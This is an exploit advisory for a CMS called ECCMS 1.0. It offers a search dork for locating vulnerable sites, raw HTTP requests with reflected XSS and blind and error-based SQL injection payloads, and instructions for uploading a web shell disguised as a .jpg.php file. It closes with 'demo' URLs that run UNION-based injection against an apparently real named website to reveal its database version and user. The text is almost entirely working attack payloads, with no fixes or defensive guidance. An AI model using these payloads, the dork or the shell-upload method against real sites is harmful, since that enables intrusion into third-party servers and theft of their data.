===================================================================== Advisory: ECCMS 1.0 - Multiple Vulnerabilities Author: R3VANBASTARD - Yogyakarta Dork: "Powered by Econnective" / Powered by Econnective inurl:/admin ===================================================================== Vulnerability Details: 1.) XSS Request GET /announcement.php?consist=1&id=3%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28950843%29%3c%2fScRiPt%3e&page=2 HTTP/1.1 Referer: http://www.localhost.com/ Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3 Host: www.kingarms.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* GET /download_catalog.php/--%3E1%3CScRiPt%3Eprompt(994458)%3C/ScRiPt%3E%3C!-- HTTP/1.1 Referer: http://www.localhost.com/ Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3 Host: www.kingarms.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* 2.) Blind SQLi Request GET /product_shop.php?cate=-1%22%20or%20%22102%22%3d%22101&country=Angola&formcountry=search&id=0 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://www.localhost.com/ Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3 Host: www.kingarms.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* Request GET /just_in.php?consist=1&id=-1%20or%2011%3d9&page=2 HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://www.localhost.com/ Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3 Host: www.kingarms.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* 3.) SQLi GET /product_shop.php?cate=all&country=United%20States&formcountry=search&id=%28select%201%20and%20row%281%2c1%29%3e%28select%20count%28*%29%2cconcat %28concat%28CHAR%2852%29%2cCHAR%2867%29%2cCHAR%28117%29%2cCHAR%28112%29%2cCHAR%2856%29%2cCHAR%2883%29%2cCHAR%28120%29%2cCHAR%2870%29%2cCHAR%28114%29%2c CHAR%2882%29%2cCHAR%2856%29%29%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29 HTTP/1.1 Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3 Host: http://www.localhost.com/ Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* 4.) UPLOAD SHELL Login into admin panel then upload your shell .JPG http://localhost/upload/banner/file_photo_00088_1421635224.jpg.php 5.) DEMO http://www.kingarms.com//download_catalog.php/--%3E1%3CScRiPt%3Eprompt%285050515%29%3C/ScRiPt%3E%3C!-- http://www.kingarms.com/product_detail.php?id=35%27+union+all+select+1,2,3,4,5,6,7,version%28%29,user%28%29,10,11,12,13,14,15,16,17,18,19,20,21%20and%20%270%27=%270-- =============================================== Thanks to: - Research And Development Center (RNDC.or.id) - Yoga0400 ===============================================